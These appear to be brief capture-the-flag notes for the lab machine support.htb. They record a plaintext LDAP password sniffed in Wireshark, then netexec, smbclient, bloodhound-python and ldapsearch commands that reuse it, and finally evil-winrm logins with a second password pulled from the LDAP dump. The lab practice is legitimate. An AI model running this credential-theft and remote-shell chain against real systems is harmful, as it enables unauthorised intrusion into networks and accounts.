Dotnet framework installed means I can run executables
Open wireshark and listen on tun0. The LDAP query will be sent in plain text
support\ldap.$nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
$ netexec smb 10.10.11.174 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
netexec smb 10.10.11.174 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --shares
$ smbclient "\\\\10.10.11.174\\SYSVOL" -U ldap%'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
$ sudo bloodhound-python -d support.htb -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -ns 10.10.11.174 -c all
Didnt get much from bloodhound
ldapsearch -H ldap://support.htb -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'dc=support,dc=htb' > ldap.out
support:Ironside47pleasure40Watchful
netexec winrm support -u support -p 'Ironside47pleasure40Watchful'
evil-winrm -i support -u support -p 'Ironside47pleasure40Watchful'
